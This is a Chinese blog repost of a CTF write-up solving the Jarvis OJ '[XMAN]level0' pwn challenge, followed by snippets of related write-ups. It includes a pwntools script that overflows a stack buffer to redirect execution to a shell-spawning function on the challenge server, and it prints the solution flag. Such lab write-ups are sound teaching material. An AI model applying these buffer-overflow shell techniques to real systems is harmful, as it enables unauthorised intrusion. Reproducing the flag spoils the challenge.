Jarvis OJ - [XMAN]level0 - Writeup

最新推荐文章于 2021-06-05 17:37:02 发布
最新推荐文章于 2021-06-05 17:37:02 发布
阅读量210 收藏
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/ZHijack/p/7620526.html
版权

差不多最简单的pwn了吧,不过本菜鸟还是要发出来镇楼

分析一下,checksec 查看程序的各种保护机制

没有金丝雀,没有pie

执行时输出Hello,World,在进行输入,溢出嘛

 开工

丢到ida里看看,先看看有价值的strings,除了输出的helloworld 还发现了“/bin/sh”,获取shell的函数都写好啦,是callsystem

继而发现在main函数执行时调用的vulnerable_function()存在不安全的read输入,可以看到buf的长度为0x80+0x8

所以可以通过输入buf,用callsystem的地址覆盖vulnerable_function()的返回地址,进而实现获取shell

程序流程(从ABO偷来下图)

灰色箭头代表覆盖vulnable_function返回地址之前的执行顺序

脚本

 

 1 #!/usr/bin/env python
 2 # coding:utf-8
 3 # writen by Exm
 4 
 5 
 6 from pwn import *
 7 io = process("./level0")
 8 io = remote("pwn2.jarvisoj.com" , 9881)
 9 elf = ELF("./level0")
10 func_addr = elf.symbols["callsystem"]
11 payload = 'a' * (0x80 + 0x8) + p64(func_addr)
12 
13 io.recvline()
14 io.sendline(payload)
15 io.interactive()
16 io.close()

 补充一下

symbols是[中括号]!!symbols是[中括号]!!symbols是[中括号]!!

执行一下就getshell啦,拿flag入探囊取物

 

flag: CTF{713ca3944e92180e0ef03171981dcd41}


作者:辣鸡小谱尼
出处:http://www.cnblogs.com/ZHijack/
如有转载,荣幸之至!请随手标明出处;

转载于:https://www.cnblogs.com/ZHijack/p/7620526.html

aoque9909
关注
Jarvis OJ--level3
Kni9hT's Blog
11-10 250
要点:通过read()的溢出构造rop链,获得write()函数的真实地址,再利用libc的偏移算出system和“/bin/sh”的地址,再次利用write()溢出,执行system,就能得到shell。 添加链接描述 flag: CTF{d85346df5770f56f69025bc3f5f1d3d0} ...
Jarvis OJ --level4
Kni9hT's Blog
11-11 250
level4与level1、2、3的区别在于:无system、无"/bin/sh"、无libc 要点:使用DynELF函数leak system函数真实地址,然后用read函数写"/bin/sh\x00"到bss段,然后调用system("/bin/sh")去getshell。 题目链接: level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0 先查看开了哪些保护: 和l...
jarvisoj——[XMAN]level0
王嘟嘟的博客
07-14 357
题目 Wp 拿下来之后发现是一个64位的,直接开ida main函数,现在对main函数已经很熟悉了 这里看到一个方法 这里按照规则覆盖即可。 脚本 from pwn import * sh=remote("pwn2.jarvisoj.com","9881") data="A"*136+p64(0x400596) sh.sendline(data) sh.interactive() sh.close() ...
[Jarvis OJ - PWN]——[XMAN]level0
Y_peak的博客
02-02 160
[Jarvis OJ - PWN]——[XMAN]level0 题目地址:https://www.jarvisoj.com/challenges 题目: checksec看看,64位,开启了NX保护 IDA,发现了我们的system函数,里面的参数也是我们想要的 找到callsystem函数的地址 0x400596 ,或者 system函数开始压参的地址0x40059A都可以作为返回地址。 exploit: from pwn import * p = remote("pwn2.jarviso
Jarvis OJ [XMAN]level0
九层台
07-07 451
查保护和运行操作系统 liu@liu-F117-F:~/桌面/oj/level0$ checksec level0 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level0/level0' Arch: amd64-64-little RELRO: No RELRO Stack: No canary foun...
Jarvis OJ level0 writeup
PLpa的博客
07-06 370
Jarvis OJ level0 writeup(萌新一枚,不足之处还请大佬指点) 拿到这个题目,首先查看一下保护: 可以看到NX打开,堆栈不可执行(在这题中也没什么用) 打开IDA查看一下: 点击右边的main会进入反汇编代码,通过反汇编可以看到main函数调用了一个vul()函数,我们双击函数跳转: 由汇编代码可以看出buf缓存区离rbp(前栈帧)有0x80h的距离,也就是说距离返回地址...
Jarvis OJ - Basic - veryeasyRSA(用实例详解RSA--超容易理解
丫丫的博客
11-27 1556
最近在研究RSA,好久没更新了......翻了数论的欧拉-费小马-模反--等等..不研究清楚他们的联系和这题的原理实在不想直接做题啥也不懂....总结了wiki和各路大神的分析,先来一波数学基础知识: RSA加密算法是一种非对称加密算法。 对极大整数做因数分解的难度决定了RSA算法的可靠性。换言之,对一极大整数做因数分解愈困难,RSA算法愈可靠。假如有人找到一种快速因数分解的算法的话,那么用R...
18.9.19 Jarvis OJ PWN----[XMAN]level3
qq_42192672的博客
09-19 382
打开压缩包,看到了两个文件,surprise! 有个lib文件 checksec一波,发现没有保护栈 那就先找到可以栈溢出的地方哟,如下 可是问题来了,没有system函数,也没有/bin/sh字符串,但是在链接库(lib文件)中可以找到,如下 我们显然必须要知道system函数与/bin/sh字符在内存中的地址,之前我也不知道该怎么找,开始向大佬学姿势 key_point:...
pwn学习-jarvisoj-level4-无libc的漏洞利用
qq_45653588的博客
12-20 277
这题下载文件下来,文件与level3反编译后伪代码基本一样,只是相比level3少了一个libc文件。level3 vulnerable_function()中存在明显的栈溢出,分配了0x88的空间,能输入0x100的内容。 ssize_t vulnerable_function() { char buf; // [esp+0h] [ebp-88h] return read(0, &buf, 0x100u); } 同样以payload payload = 'a' * 0x8c + p32
18.9.18 Jarvis OJ PWN----[XMAN]level0
qq_42192672的博客
09-18 193
拖进IDA 看到有函数callsystem,那就直接把主函数往它身上引 在vulnerable里有缓冲区,试着溢出 ebp偏移量0x80个字节,覆盖后再用8个字节覆盖保存的ebp,然后将返回地址设为callsystem函数的地址 脚本 #coding=utf-8 from pwn import * #conn=process('./[XMAN]level0') conn=remot...
Jarvis OJ-PWN-[XMAN]level0 wp
分不清东西南北的Laffey
09-22 944
地址:nc pwn2.jarvisoj.com 9881 第一次做pwn的题目 先准备一下环境 1.pwntools sudo pip install pwntools 2.python sudo apt install python-pip 先打开虚拟机 把文件放进去用checksec看一下 发现是64位的 程序编译时关了栈不可执行保护 这说明我们可以在buf里面输入shellcode和填...
JarvisOJ-PWN-Level0
杀生丸?不,其实我要的是桔梗
03-15 780
JarvisOJ-PWN-Level0 IDA打开分析。 在Export找到这两个关键函数。 先双击进入main 关键函数在vulnerable_function(),继续跟进。 可以看出read函数是把标准输入的200位的写入buf中。 再看buf: 低位: 高位: 所以buf的首地址到返回地址共=(+0x0000000000000008) - (-0x00...
[XMAN2018排位赛]Dragon Quest [MRCTF2020]VirtualTree
寻梦&之璐
06-05 901
[XMAN2018排位赛]Dragon Quest [MRCTF2020]VirtualTree
BUUCTF:[XMAN2018排位赛]通行证
qq_46230755的博客
12-16 1606
经典套娃题目了: 题目:a2FuYmJyZ2doamx7emJfX19ffXZ0bGFsbg== 很明显第一步是base64: 利用base64解密网站解密得到 kanbbrgghjl{zb____}vtlaln 第二步是栅栏密码: 利用栅栏密码网站进行加密,Key等于7.(这一步一开始以为是解密,做了很久,快吐了) 最后得到 kzna{blnl_abj_lbh_trg_vg} 第三步是凯撒密码: 一样是利用凯撒密码网站解密 最后得到 xman{oyay_now_you_get_it} 把开头换成f.
XMAN【我真的好菜-同pizza师傅修炼笔记一】easyvm&easywasm
BadRer的博客
08-13 1630
前言 -。-做这两题好想哭-。- 我好菜丫,大佬直接看伪汇编写脚本。我呢,脚本都快看不懂。 wasm wasm虐我千百遍我却待她如初恋。-。 之前遇到过类似的,但是没有仔细的研究,只知道夜影师傅的blog有写过类似的文章,但是没写全。 首先是用wabt项目将wasm转化为c代码,虽然效果感人,但至少比wat要强一点。 一直想要调试它,但我真的好菜,网上找了好多demo不过报了好多奇奇...
Xman pwn level0 writeup
qq_39596232的博客
08-23 1606
题目描述: 菜鸡了解了什么是溢出,他相信自己能得到shell 解题思路: 1、拿到文件,首先查看一下文件类型: tucker@ubuntu:~/pwn$ file level0 level0: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, fo...
XMAN【我真的好菜-同pizza师傅修炼笔记二】Dragon Quest
BadRer的博客
08-15 837
前言 题目本身用C++写的,很多人做出来了,会用工具也不算很难。 pizza师傅提供了另一种解决思路 分析 用pingtools的方法就不说了,可以参考我的这篇文章 或者有个github项目叫做pinCTF 通过查看x,y的交叉引用,发现只有对其读的操作,而没有写的操作,并且x,y又都在bss段中,属于未初始化的变量,初始值即为0,因此x,y是题目加的混淆,所以写个ipython脚本...
[CTF]Jarvis ClassicalCrackme
qq_42152365的博客
02-15 230
[CTF]Jarvis ClassicalCrackme 100 1. 首先拖DiE,发现是.NET,拖ILSpy 2. 拖入查找源代码,发现对用户输入进行base64加密后与一个字符串比较,不说了,base64解密,得到答案...
jarvisoj_level0
最新发布
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值